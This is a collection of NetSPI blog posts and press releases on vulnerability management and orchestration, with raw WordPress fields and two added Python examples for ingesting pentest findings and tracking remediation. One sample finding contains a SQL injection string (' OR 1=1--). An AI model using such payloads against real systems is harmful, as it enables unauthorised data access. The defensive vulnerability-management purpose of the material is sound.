Data silos aren’t inevitable, but they are common. Knocking them down will go a long way towards reducing your organization’s cybersecurity risk posture by decreasing your overall time to remediate.

Learn more about vulnerability orchestration and NetSPI Resolve:

Recurring Vulnerability Management Challenges That Can't Be Ignored
Published 2018-10-15

Stories of new data breaches grab headlines again and again. Many of these breaches are the result of known vulnerabilities left un-remediated, and in some cases, organizations have been aware of these vulnerabilities for years. Why weren’t these problems fixed sooner? Wouldn't organizations try to fix them as soon as possible to avoid a breach?

Every organization strives to fix vulnerabilities rapidly. Unfortunately, fixing vulnerabilities is a complex task.

First, organizations are flooded with vulnerabilities. New vulnerabilities are reported daily and the volume is only increasing. Keeping pace is tough.

Second, there's no single pane of glass for tracking all vulnerabilities. Organizations use multiple scanners to detect vulnerabilities, each living in its own walled garden. Application and network vulnerabilities are treated separately, typically in disconnected systems. Vulnerabilities discovered via pentesting may only reside in reports. Detective control tests find weaknesses in security tools, and auditing tools find vulnerabilities in configurations – and these results may not align with scan results. Unifying multiple sources in a central location, and normalizing the results for accurate tracking, is a big challenge.

Third, even if you have all vulnerabilities in a single pane, remediation processes vary and take time. Application vulnerabilities must go through the software development life cycle (SDLC), while network vulnerabilities have their own workflow. Identifying the right asset owner can be a challenge because CMDB information is often inaccurate. Configuration changes usually need to go through a change control board process, and patches need to be widely deployed across a large number of devices. There is little margin for error: fixing 99% of your vulnerabilities is great, but all it takes is that last 1% to cause a major breach.

On average, for every vulnerability patched, organizations lose 12 days coordinating across multiple teams. Contributing factors include:

  • Use of emails and spreadsheets to manage patching processes (57%)
  • No common view of systems and applications to be patched (73%)
  • No easy way to track if patching occurs in a timely manner (62%)

Fourth, many security organizations spend an inordinate amount of time focused on regulatory compliance. It’s critically important for your organization to build a strong, business-aligned security program that meets regulatory compliance standards. When a program is built to simply “check the box” of compliance, the results are inefficient, insecure, and not aligned with the business.

Finally, and most importantly, sheer human effort is not enough to overcome the vulnerability challenge because organizations don't have enough talent or resources. A solid vulnerability management program requires talent focused on security, development, and operations – three skill-sets that are in high demand. Cybersecurity is experiencing negative unemployment; IT operations is fully occupied maintaining up-time; and developers are immersed in the agile SDLC.

We see common challenges in organizations of all sizes and across many industries. In the coming articles in this series, we'll share our experiences and provide suggestions on how you can solve these challenges!

What's Next and New with NetSPI Resolve
Published 2018-09-28

Here at NetSPI, we see firsthand the struggles enterprises face to fix vulnerabilities. It’s concerning when our pentesters and customers continue to find the same vulnerabilities that have yet to be remediated – at the same client, year after year.

The struggle faced by enterprises in managing vulnerabilities is not limited to manual penetration testing results. Scanners find millions of vulnerabilities in our customer environments, and we see the sheer volume overwhelming their remediation efforts. Even if 99% of assets can be fixed within a reasonable time-frame, a dangerous window of opportunity is allowed to persist if the last 1% lingers.

We're taking action to help our customers solve this challenge. Fortunately, we have a solid foundation from which to tackle the problem.

Our own penetration testing platform, NetSPI Resolve 6, was built for the purpose of managing our own penetration testing process. The Resolve software platform has given NetSPI the competitive edge in pentesting by allowing our pentesters to spend more time on testing and less time on overhead tasks.

Resolve works by:

  1. Ingesting vulnerabilities from any source: scanners and manual pentesting reports
  2. Normalizing the definition of the vulnerabilities to a standard rubric
  3. Correlating the vulnerabilities to de-duplicate and compress the findings
  4. Automatically generating reports

Customers have approached us about whether they could use Resolve in their own environments to help them conquer their challenges. We agreed. Since that time, we've licensed the use of the Resolve platform to the benefit of many organizations, especially those with pentesters.

Now we're taking the next step. You see, Resolve wasn't built for vulnerability management and orchestration, which is the key need facing the majority of our customers.

So we're leveraging the great features of Resolve 6 we at NetSPI use to manage pentesting and expanding the platform to serve the larger vulnerability management and orchestration market. For the past year, we've been rebuilding the Resolve platform for the next generation, Resolve 7.

Resolve 7 will be a service-oriented architecture that scales to the massive data needs of our customers. It will be web-based, using a virtual appliance for easy deployment. We are adding more administration features, such as field-level role-based access control (RBAC) permissions, granular security groups, and single-sign on (SSO) support, to make the platform enterprise-ready out of the box. We've added a vulnerability orchestration component with an integration engine to complement the powerful vulnerability correlation engine. And we're building a new user interface with expanded capabilities for reporting and business intelligence visualizations.

We're building Resolve 7 for you - so you can help stem the tide of your vulnerability flood. We'll showcase new features of Resolve in coming posts, so stay tuned.

Contact us for more information about the availability of NetSPI Resolve 7.0.

Published 2018-09-14

Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process. We provide three best practices you can use when engaging a third-party pentesting company to ensure the pentesting data is delivered in a way that is compatible with your security orchestration process.

Pentesting is an essential threat and vulnerability management process used to discover some of the most important vulnerabilities in your environment. Human pentesters find vulnerabilities that scanners can't catch, but an attacker will find. The challenge often becomes how to track and remediate those vulnerabilities after the test is complete.

Two Challenges of Pentesting Data for Security Orchestration

Vulnerability scanners use known data formats that don't change often, which makes them easy to incorporate into security orchestration tools. Once you've integrated your scan results into a vulnerability orchestration process and normalized them, you have some confidence that the process will continue to work as designed. In comparison, pentesters often do not follow a known data format and may add information to the report beyond the specific findings.

Findings from third-party penetration testing companies often arrive as a static report in PDF format. This format makes it difficult to streamline those results in an automated way when you expect a standard input. Some reports may come with a CSV file of the findings, which provides a more structured data format, but correlating those findings with existing vulnerabilities may require manual review.

The pentesting company’s report may include custom information. While this documents the vendor's work and shows they did more than a scan, it presents problems for streamlining that data into an orchestrated process - especially if the information must be enriched before sending it to the remediation resources. For instance, the remediation recommendations or the described business impact may not align with your corporate policy. You may disagree with their severity assessment, for example, because you have more knowledge of the asset's importance or of mitigating factors in your environment.

Three Best Practices for Pentest Data Compatibility

Receiving formatted, structured pentest results from a penetration testing company allows you to streamline your vulnerability orchestration process and track the findings through to remediation. The following three best practices can help align the pentest data with your organization’s process.

Provide a template for your expected data format. The data format for the pentest findings must be predefined for your vulnerability orchestration and automation to work properly. You know your format, but the pentesting company doesn't. Share your format prior to engaging the vendor to ensure they will accommodate your requirements. The best pentesting company will be able to deliver the results in a structured format that's customized for you.

Provide a reference rubric with IDs for your common vulnerability types. Consider your normalization requirements for vulnerability definitions. If you've standardized the common ones, provide a reference rubric that the vendor can add to each result. A rubric ID on every finding lets you correlate it directly with an existing definition instead of matching on free-text titles. Once the formatted, structured pentest results are in your orchestration process, you can track them to remediation.

Provide a retest template. When submitting a retest request, ensure that the vendor's output matches an expected format so you can automate the data marking for closing the vulnerabilities that have been verified. This might be the same format you started with, or it might be a simpler retest template for the vendor to fill out.

These three best practices can help you ensure the pentesting data is compatible with your vulnerability orchestration process.
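As an added example (not NetSPI code and not part of the Resolve platform), the following Python sketches what the three practices above look like once they are enforced in code: a fixed findings template that rejects rows which break it, a rubric that maps the vendor's reference IDs onto your own definitions and applies a local severity override from your asset register, and a retest template that only closes findings the tester explicitly verified. The column names, rubric IDs, asset names, severity policy and sample findings are assumptions constructed for this example.

```python
"""Added example, not NetSPI or Resolve code: ingest third-party pentest findings
that follow an agreed template, map them onto an internal rubric, apply a local
severity policy, and close them from a retest template. All IDs and data are assumed."""
import csv
import io
import json
from dataclasses import dataclass, field

# Assumed rubric shared with the vendor: reference ID -> canonical definition.
RUBRIC = {
    "VULN-001": "SQL Injection",
    "VULN-002": "Reflected Cross-Site Scripting",
    "VULN-003": "Missing HTTP Security Headers",
}
# Assumed asset register: local knowledge the vendor does not have.
ASSET_CRITICALITY = {"payments-api.example.com": "high", "intranet-wiki.example.com": "low"}
SEVERITIES = ["Informational", "Low", "Medium", "High", "Critical"]
# Columns the template requires; extra columns are ignored, missing ones are rejected.
REQUIRED = ("finding_id", "rubric_id", "asset", "location", "vendor_severity", "evidence")


@dataclass
class Finding:
    finding_id: str
    rubric_id: str
    name: str
    asset: str
    location: str
    vendor_severity: str
    severity: str           # after local policy is applied
    evidence: str
    status: str = "open"    # open | closed | needs_review
    notes: list = field(default_factory=list)


def adjust_severity(vendor_severity: str, asset: str) -> str:
    """Assumed local policy: one level up on high-criticality assets, one down on low."""
    idx = SEVERITIES.index(vendor_severity)
    criticality = ASSET_CRITICALITY.get(asset, "medium")
    if criticality == "high":
        idx = min(idx + 1, len(SEVERITIES) - 1)
    elif criticality == "low":
        idx = max(idx - 1, 0)
    return SEVERITIES[idx]


def ingest_findings_csv(text: str) -> list:
    """Parse a vendor CSV in the agreed template. Rows that break the template or
    use an unknown rubric ID are rejected, so bad data never enters the workflow."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        missing = [c for c in REQUIRED if not row.get(c)]
        if missing:
            raise ValueError(f"finding {row.get('finding_id')!r} missing {missing}")
        if row["rubric_id"] not in RUBRIC:
            raise ValueError(f"unknown rubric id {row['rubric_id']!r}; ask vendor to re-map")
        if row["vendor_severity"] not in SEVERITIES:
            raise ValueError(f"unknown severity {row['vendor_severity']!r}")
        findings.append(Finding(
            finding_id=row["finding_id"], rubric_id=row["rubric_id"],
            name=RUBRIC[row["rubric_id"]], asset=row["asset"], location=row["location"],
            vendor_severity=row["vendor_severity"],
            severity=adjust_severity(row["vendor_severity"], row["asset"]),
            evidence=row["evidence"],
        ))
    return findings


def apply_retest(findings: list, retest_json: str) -> list:
    """Assumed retest template: JSON list of {finding_id, result, tester_note}.
    Only an explicit 'fixed' closes a finding; anything the tester could not verify
    is parked for human review rather than silently left open or closed."""
    by_id = {f.finding_id: f for f in findings}
    closed = []
    for entry in json.loads(retest_json):
        f = by_id.get(entry["finding_id"])
        if f is None:
            raise ValueError(f"retest refers to unknown finding {entry['finding_id']!r}")
        if entry["result"] == "fixed":
            f.status = "closed"
            closed.append(f.finding_id)
        elif entry["result"] == "not_fixed":
            f.status = "open"
        else:
            f.status = "needs_review"
        f.notes.append(entry.get("tester_note", ""))
    return closed


# Constructed sample input in the assumed template (not real findings).
SAMPLE_CSV = """finding_id,rubric_id,asset,location,vendor_severity,evidence
PT-2018-001,VULN-001,payments-api.example.com,/api/v1/orders?id=,High,"' OR 1=1-- returned every order"
PT-2018-002,VULN-003,intranet-wiki.example.com,/,Medium,No X-Frame-Options or CSP header
"""
SAMPLE_RETEST = json.dumps([
    {"finding_id": "PT-2018-001", "result": "fixed", "tester_note": "query now parameterized"},
    {"finding_id": "PT-2018-002", "result": "could_not_test", "tester_note": "host unreachable"},
])
```

With the sample data, the SQL injection on the payments API is raised from High to Critical by the asset register, the header finding on the low-value wiki is lowered to Low, and the retest closes only the first finding; the second is routed to a human because "could not test" is not evidence of a fix. Rejecting unknown rubric IDs up front is deliberate: a finding that cannot be correlated is exactly the one that would otherwise be lost in manual review.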

Next Steps

Read the earlier posts in this series:

[post_title] => How to Streamline Pentest Data to Security Orchestration
[post_excerpt] => Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process.
[post_status] => publish
[post_name] => how-to-streamline-penetest-data-to-security-orchestration
[post_modified] => 2021-04-14 00:57:44
[guid] => https://netspi.staging.wpengine.com/?p=1670
[post_type] => post
)

[67] => WP_Post Object
(
[ID] => 1654
[post_author] => 91
[post_date] => 2018-08-31 07:00:53
[post_content] =>

Vulnerability data must be tracked in order to ensure remediation - or vulnerabilities can fall through the cracks leaving your organization exposed. Most vulnerability data comes from scanners, though the most important vulnerability data often comes from humans. In this third post of a four-part series on threat and vulnerability management tools, we provide guidance on how to effectively track vulnerability data in the context of orchestration.

Several non-optimized tools commonly used for tracking vulnerability remediation include the following, each of which has significant limitations:

Excel and SharePoint: Companies often use Excel or SharePoint to track remediation from a central list of findings - a single spreadsheet file where dozens of users comb through thousands of vulnerabilities. Tracking remediation this way certainly presents challenges, because spreadsheet tools are not designed to help manage such complicated data sets and team collaboration. The information often gets overwritten or marked improperly. The accuracy of the data is questionable, making reporting difficult.

JIRA: Alternately, some companies use JIRA for tracking software vulnerabilities, which helps ensure that processes are followed. Unfortunately, most organizations have many JIRA instances across their development environments. Distributing the results across many JIRA instances leads to an inability to report on the data effectively. Storing the results in a central JIRA system has advantages, but getting stakeholders to take the time to log in and review the findings in a system other than the one they use daily can be difficult.

ServiceNow: Some companies attempt to use ServiceNow, which has the advantage of more robust ticketing, to track vulnerabilities on the networking side. Unfortunately, some of the same ingestion challenges exist, and you lose the fidelity of having all of the vulnerabilities in a single place.

Home-built: Other companies have built systems that connect to other internal systems. While they work, home-built tools are difficult to maintain and often are maintained less formally than normal development efforts, as they are unrelated to the core business purpose. These systems are often just databases with a minimal user interface, not fully optimized for the purpose.

Best Practices Checklist: Security Orchestration for Vulnerability Remediation

Best practices for threat and vulnerability management require a system for remediation workflows that can handle the following seven tasks:

  1. Ingestion of various data formats with flexible normalization
  2. Reviewing of normalized data for changes and modifications as needed
  3. Distribution of normalized data to various external systems
  4. Tracking the data distributed externally to keep a central listing up to date
  5. Ensuring policy is adhered to across the various systems where the data is tracked
  6. Sending notifications for users and keeping humans involved in the process, especially when vulnerabilities become overdue
  7. Reporting on the outcome of vulnerabilities by group, business unit, or globally across the organization

As a result, a checklist for a security orchestration tool for vulnerability remediation includes these six capabilities:

  1. Serve as a central clearinghouse of vulnerability data
  2. Automate many steps of the remediation process
  3. Coordinate varying processes based on the organization's internal structure and environment
  4. Integrate with a large number of systems via API
  5. Define a workflow with decision points based on data criteria
  6. Notify key users when something is not right

Make sure any threat and vulnerability management tool you consider can check these six boxes before you try it out.

Next Steps

Read the earlier posts in this series:

[post_title] => How to Track Vulnerability Data and Remediation Workflow
[post_excerpt] => Vulnerability data must be tracked in order to ensure remediation - or vulnerabilities can fall through the cracks leaving your organization exposed. Most vulnerability data comes from scanners, though the most important vulnerability data often comes from humans.
[post_status] => publish
[post_name] => how-to-track-vulnerability-data-and-remediation-workflow
[post_modified] => 2021-04-14 07:02:15
[guid] => https://netspi.staging.wpengine.com/?p=1654
[post_type] => post
)

[68] => WP_Post Object
(
[ID] => 1644
[post_author] => 91
[post_date] => 2018-08-17 07:00:57
[post_content] =>

In the post Are You Flooded with Vulnerabilities?, we explored the ever-growing mountain of data that organizations face in managing their vulnerabilities. While software is at the root of the vulnerability problem, it's also the solution. As individuals approach large volumes of data, software can support better decision making, collaboration, tracking, and visualization.

The key to a mature threat and vulnerability management program is to set up and consistently follow an established process that tracks each vulnerability throughout its life cycle. Given a best-practices process, the challenge becomes its real-world implementation. Two important capabilities work together to help you implement your process in the real world: automation and security orchestration.


How Does Automation Work?

Automation eliminates the normal human effort to accomplish a task. Simple, commonplace tasks, such as retrieving data or opening a ticket can be automated. A script encodes a task for software to complete.

However, automation is not a complete solution. When humans operate automation routines, the process tends to break down quickly - and the cost of overhead adds up. Clunky, manual steps may remain, and humans running the automation routines make mistakes. Tribal knowledge tends to get lost over time and consistency is difficult to achieve. This is where security orchestration comes to the rescue.

What is Security Orchestration?

Let's first explore the term. Security orchestration connects multiple systems and automation routines in a way that provides a consistent process for data to follow. Orchestration is like an automated car assembly line, where multiple robots each help build the vehicle as it advances through the manufacturing process. But robots alone are not enough. Like an automation script, each robot only does a specific task. Building a reliable car also requires the overall coordination of those individual tasks, which is what orchestration provides.

At inflection points, decisions can be made on individual records automatically, based on data. Automation scripts can be triggered to perform complex data-parsing tasks. Tool integrations allow for automated data retrieval and synchronization among systems. When human analysis is needed, the process can wait for human input.

Beyond consistent implementation, an even greater benefit of a security orchestration platform is that it allows you to minimize the human overhead and maximize the human capacity for analysis.

Differences Between Security Orchestration and Automation

In review of the differences, here are the points you need to understand when determining if a tool does orchestration, automation, or both:

Automation

  • The tool can be configured to calculate values based on input variables
  • The tool can connect to various external system APIs
  • The tool can create or update large data sets from various sources
  • The tool can run scripts or routines in some format

Security Orchestration

  • The tool can make decisions and perform different actions based on those decisions
  • The tool can pause and wait
  • The tool can execute sequential automation routines over a time period
  • The tool allows configuration of automation steps, decisions, and pauses within a custom workflow
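As an added example (not NetSPI's Resolve code), the following Python models the orchestration loop described in this post and in the seven tasks and six capabilities of the previous post on tracking vulnerability data: a central store of records, a policy that sets SLA days by severity, a decision point that distributes routine scanner findings automatically but pauses pentest findings and Criticals for an analyst, an adapter that stands in for a ticket system API, a sync step that pulls the external state back into the central listing and notifies on overdue records, and a report by business unit. The policy table, the fake ticket system, the queue mapping and the sample records are constructed assumptions.

```python
"""Added example, not NetSPI's Resolve code: a minimal remediation orchestration loop
(central record store, SLA policy, decision point with a pause for a human, distribution
to a ticket system via an adapter, state sync, overdue notices, report by business unit).
Policy table, fake ticket system and sample records are constructed assumptions."""
from dataclasses import dataclass, field
from datetime import date, timedelta
from typing import Optional

SLA_DAYS = {"Critical": 7, "High": 30, "Medium": 90, "Low": 180}  # assumed policy


@dataclass
class Record:
    record_id: str
    asset: str
    business_unit: str
    severity: str
    source: str                   # "scanner" or "pentest"
    found: date
    state: str = "new"            # new -> review (optional) -> distributed -> closed
    ticket: Optional[str] = None
    notifications: list = field(default_factory=list)

    @property
    def due(self) -> date:
        return self.found + timedelta(days=SLA_DAYS[self.severity])


class FakeTicketSystem:          # stand-in for a Jira/ServiceNow API adapter
    def __init__(self):
        self.tickets, self._n = {}, 0
    def create(self, summary: str, queue: str) -> str:
        self._n += 1
        self.tickets[f"{queue}-{self._n}"] = {"summary": summary, "status": "Open"}
        return f"{queue}-{self._n}"
    def status(self, key: str) -> str:
        return self.tickets[key]["status"]
    def resolve(self, key: str):  # what the remediation team does in their own tool
        self.tickets[key]["status"] = "Resolved"


class Orchestrator:
    def __init__(self, ticket_system, queues: dict):
        self.store = {}           # central clearinghouse of every record
        self.ts, self.queues = ticket_system, queues  # queues: business_unit -> ticket queue
        self.human_queue = []     # records paused for analyst input

    def ingest(self, record: Record):
        self.store[record.record_id] = record

    def route(self):
        # Decision point: pentest findings and Criticals pause for an analyst; the rest go out.
        for r in self.store.values():
            if r.state != "new":
                continue
            if r.source == "pentest" or r.severity == "Critical":
                r.state = "review"
                self.human_queue.append(r.record_id)
            else:
                self._distribute(r)

    def human_decision(self, record_id: str, severity: Optional[str] = None, accept: bool = True):
        # The paused step resumes with the analyst's input.
        r = self.store[record_id]
        r.severity = severity or r.severity
        if accept:
            self._distribute(r)
        else:
            r.state = "closed"    # risk accepted or false positive, still on record
        self.human_queue.remove(record_id)

    def _distribute(self, r: Record):
        r.ticket = self.ts.create(f"{r.severity}: {r.record_id} on {r.asset}",
                                  self.queues.get(r.business_unit, "SEC"))
        r.state = "distributed"

    def sync(self, today: date):
        # Pull external state back into the central listing; notify when past SLA.
        for r in self.store.values():
            if r.state == "distributed" and self.ts.status(r.ticket) == "Resolved":
                r.state = "closed"
            if r.state != "closed" and today > r.due:
                r.notifications.append(f"{today}: overdue by {(today - r.due).days} days")

    def report(self) -> dict:
        out = {}
        for r in self.store.values():
            bu = out.setdefault(r.business_unit, {"open": 0, "closed": 0, "overdue": 0})
            bu["closed" if r.state == "closed" else "open"] += 1
            bu["overdue"] += int(r.state != "closed" and bool(r.notifications))
        return out


def run_demo(today: date = date(2018, 9, 1)) -> Orchestrator:
    # One pass over constructed sample records (not real data).
    ts = FakeTicketSystem()
    orc = Orchestrator(ts, {"payments": "PAY", "corp-it": "IT"})
    for rec in (Record("R1", "payments-api", "payments", "High", "scanner", date(2018, 7, 1)),
                Record("R2", "intranet-wiki", "corp-it", "Low", "scanner", date(2018, 8, 15)),
                Record("R3", "payments-api", "payments", "Medium", "pentest", date(2018, 8, 20))):
        orc.ingest(rec)
    orc.route()                                # R1, R2 ticketed; R3 waits for a human
    ts.resolve(orc.store["R2"].ticket)         # remediation team closes R2 in their tool
    orc.human_decision("R3", severity="High")  # analyst raises severity; R3 is ticketed
    orc.sync(today)                            # R2 closes centrally; R1 is past its SLA
    return orc
```

run_demo() walks one cycle. The property worth noticing is that the central store stays authoritative even though the remediation team only ever touched their own ticket system: the sync step is what keeps the listing current, and the overdue notice is generated from policy, not from anyone remembering to check.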
[post_title] => Security Orchestration vs. Automation: What's the Difference?
[post_excerpt] => In the post Are You Flooded with Vulnerabilities?, we explored the ever-growing mountain of data that organizations face in managing their vulnerabilities. While software is at the root of the vulnerability problem, it's also the solution.
[post_status] => publish
[post_name] => orchestration-vs-automation-whats-the-difference
[post_modified] => 2021-04-14 07:02:23
[guid] => https://netspi.staging.wpengine.com/?p=1644
[post_type] => post
)

[69] => WP_Post Object
(
[ID] => 13198
[post_author] => 91
[post_date] => 2018-08-03 07:00:25
[post_content] =>

NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2018, Aug. 8-9 (booth 1643) in Las Vegas, NV. NetSPI will both present and exhibit at the conference to showcase solutions that improve an organization’s security posture. Event attendees will have the opportunity to see first-hand how NetSPI’s portfolio is designed to address the most critical vulnerability challenges that security organizations face. NetSPI’s security experts will provide best practices and insights during their presentations and will also be available to meet 1:1. To schedule your sessions, click here.

NetSPI’s presentations at Black Hat USA include:

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Servers in Enterprise Environments
When: Thursday, Aug. 9, 2018 at 10:00 a.m.
Where: Business Hall (Oceanside), Arsenal Station 4
Who: Scott Sutherland and Antti Rantasaari of NetSPI
Session Summary: This session includes training on functions supporting SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution. The tool includes additional functions used by administrators to quickly inventory the SQL Servers in their Active Directory domains and perform common threat hunting tasks related to SQL Server. PowerUpSQL enables red, blue, and purple teams to automate day-to-day tasks involving SQL Server.

Mainframe [z/OS] Reverse Engineering and Exploit Development
When: Thursday, Aug. 9, 2018 at 3:50 p.m.
Where: Jasmine Ballroom
Who: Chad Rikansrud, NetSPI’s mainframe partner at RSM Partners
Session Summary: Talk to a Fortune 500® company that runs a mainframe and they'll tell you two things: (1) without their mainframes they'd be out of business, and (2) they do not conduct any security research on them, let alone vulnerability scans. This session covers the tools that exist on the platform to help you do your own reverse engineering, followed by detailed steps on how to start your own exploit development.

In addition to these presentations, attendees will have the opportunity to learn more about the following:

Application & Infrastructure Security Testing Services: See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides penetration testing services encompassing everything from mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include Threat & Vulnerability Management Assessments and attack simulation services, which encompass red team, social engineering, detective controls testing, and more.

NetSPI Resolve™ Vulnerability Orchestration Software: Learn how NetSPI Resolve removes the risk of managing vulnerabilities in spreadsheets and the arduous administrative tasks that cause large-scale inefficiencies. The software provides a system of record for all application and infrastructure vulnerabilities through its scanner-agnostic integration engine, which also brokers cross-departmental workflow and communications. NetSPI Resolve reduces your risk by providing the visibility needed to actively manage your remediation efforts while increasing your security testing coverage by over fifty percent without adding staff. Click here to sign up for a 1:1 security advisory session or a software demo.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.

[post_title] => NetSPI to Present and Exhibit at Black Hat USA 2018
[post_excerpt] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2018, Aug. 8-9 (booth 1643) in Las Vegas, NV.
[post_status] => publish
[post_name] => netspi-to-present-and-exhibit-at-black-hat-usa-2018
[post_modified] => 2021-04-14 06:54:05
[guid] => https://www.netspi.com/?post_type=netspi_news&p=13198
[post_type] => post
)

[70] => WP_Post Object
(
[ID] => 1609
[post_author] => 91
[post_date] => 2018-07-27 07:00:02
[post_content] =>

Most organizations have more vulnerabilities than can be fixed at current resource levels. Halfway through 2018, the NVD is on pace to match the historic 20,000 CVEs published in 2017.

A perfect storm of circumstances can make it difficult for your threat and vulnerability management program to maintain a good security posture. Multiple scanners are required to get full coverage, which in turn piles on the work. The sheer quantity of patches, configuration changes, and code changes is daunting. Automated patch management solutions are limited by the risk of downtime, so human intervention is required for many configuration and code changes.

The growth of the cybercrime industry requires companies to accelerate the vulnerability fix cycle. Exploits come out ever faster, as malicious actors take advantage of known vulnerabilities that organizations have not yet fixed.

Organizations that prioritize vulnerabilities based on risk will maximize security resources. There's no perfect intelligence on new exploits, and lessening the risk doesn't mean the risk is gone. However, risk-based approaches to threat and vulnerability management offer the best path forward when vulnerabilities pile up and resources are limited.

Keeping up with a blizzard of vulnerabilities and exploits requires closing the remediation gap: the time from discovery to fix. The fundamental challenge is remediating every finding promptly. Your organization will want to get through a litany of remediation workflows quickly to minimize effort. Nonetheless, every vulnerability requires a decision and, usually, subsequent effort.

Five Phases of the Vulnerability Management Process

We recommend your organization implement the following five-phase vulnerability management process in managing the vulnerability life cycle:

  1. Discovery
  2. Correlation & enrichment
  3. Verification
  4. Prioritization
  5. Remediation

In addition, these five goals help document each phase of the vulnerability management lifecycle:

  • Identify the key stakeholders and systems involved
  • Determine what policies have bearing in each phase
  • Define the inflection points where a decision must be made
  • Define the junctures where communication must occur
  • Establish output destinations for the data flow

Move a Mountain of Vulnerabilities

Processes that look good on paper may break down in the face of real world challenges. In your organization, different departments may own responsibility for remediation, and they each may use separate systems. Uptime may be prioritized quietly over patch management without notification of exception requests. Code changes need to be vetted in the software development life cycle (SDLC) before being released into production. Configuration changes need to be evaluated for potential impact to running systems.

Implementation of a complete vulnerability management process is a challenge that is made easier by security orchestration tools – a topic for a future post. Defining a complete security orchestration process will help you move mountains.

[post_title] => Are You Flooded With Vulnerabilities?
[post_excerpt] => Do you have more vulnerabilities piling up than you can fix with current resources? Time to remediation lengthens as volume grows. Organizations that prioritize vulnerabilities based on risk will maximize security resources and results, so we recommend this five-phase process to manage the vulnerability life cycle.
[post_status] => publish
[post_name] => flooded-with-vulnerabilities
[post_modified] => 2021-04-14 07:02:30
[guid] => https://netspi.staging.wpengine.com/?p=1609
[post_type] => post
)

[71] => WP_Post Object
(
[ID] => 13190
[post_author] => 91
[post_date] => 2018-03-07 07:00:59
[post_content] =>

NetSPI LLC, the leading security testing and vulnerability orchestration company, today announced a new professional services line delivering Threat and Vulnerability Management Program Development. This new offering expands NetSPI’s professional services and leverages the power of the NetSPI Resolve™ software platform.

As the threat landscape grows in complexity, NetSPI remains committed to helping clients solve the vulnerability management challenge. Enterprises are overwhelmed with application and infrastructure vulnerabilities and have identified the need for a solution that expands beyond technical testing. NetSPI’s solution helps customers evolve from tactical and reactive penetration testing to a proactive program that reduces risk to their business.

“Our clients are faced with a constantly changing attack surface and new emerging threats every day. We created this offering to help them build a program to quickly identify and fix the vulnerabilities most impactful to their business,” said Charles Horton, senior vice president of professional services.


NetSPI’s service is designed to help clients evaluate and understand how well they are managing technical vulnerabilities and reducing risk. Its Threat and Vulnerability Management Program Framework evaluates programs in a consistent manner, providing a maturity evaluation and a roadmap for continuous improvement. NetSPI focuses on seven foundational elements that must work in concert to address the vulnerability management challenge and reduce risk:

  • Asset Management
  • Configuration Management
  • Secure Software Development
  • Vulnerability and Patch Management
  • Technical Testing
  • Threat Intelligence and Monitoring
  • Incident Response

“While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically,” said Deke George, NetSPI chief executive officer. “NetSPI is an industry leader in the technical testing space, and this service builds upon that expertise to better strategically serve our clients.”

More information about this service can be found here. On March 8, 2018 at 1:00 p.m. CST NetSPI is hosting an educational webinar on this topic and will provide attendees tools, techniques and best practices for assessing their organization’s security maturity. Register today at https://www.netsp.com/research/cybersecurity-webinars.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.

[post_title] => NetSPI Announces New Advisory Services Focused on Threat and Vulnerability Management
[post_excerpt] => Empowering organizations with a pragmatic approach to address their vulnerability management challenges across their entire environment.
[post_status] => publish
[post_name] => netspi-announces-new-advisory-services-focused-on-threat-and-vulnerability-management
[post_modified] => 2021-04-14 06:56:43
[guid] => https://www.netspi.com/?post_type=netspi_news&p=13190
[post_type] => post
)

[72] => WP_Post Object
(
[ID] => 13188
[post_author] => 91
[post_date] => 2017-11-20 07:00:28
[post_content] =>

Minneapolis, Minnesota  –  ​​​​NetSPI LLC, the leading​ provider of enterprise security testing and vulnerability correlation software, announced leadership appointments and restructuring initiatives today to accelerate product innovation and strategic growth. NetSPI is intensifying its focus in high-growth security and vulnerability management areas while positioning to accelerate long-term market growth, driving customer value, and ultimately making the company more efficient and profitable.

“The announcements today are critical in NetSPI’s transformational journey,” said Deke George, CEO, NetSPI. “Our transformation began with our new logo and website design acting as visual cues letting our employees, clients, and partners know that it is a new day at NetSPI. These key leadership appointments create the foundation needed for the next iteration of growth.”

In addition to the new brand, NetSPI appointed leadership talent to strengthen the structure for exponential growth and long-term market adoption. To ensure an innovative, customer-centric approach, NetSPI named Aaron Shilts president and chief operating officer. With 20 years of experience in cybersecurity and operations, Shilts brings valuable leadership during a period of rapid transformation. Prior to joining NetSPI, Shilts led worldwide services for Optiv and FishNet Security. Over his 14-year tenure, he steered the organization to deliver customer success, sustained growth and profitability. Shilts’ leadership team includes Pavan Gorakavi as senior vice president of software engineering, Steve Antone as vice president of sales, Mary Braunwarth as vice president of marketing, and Joshua Scott as vice president of product management. These structural changes highlight NetSPI’s commitment to drive the evolution of its threat and vulnerability portfolio while demonstrating foundational measurements of client success.


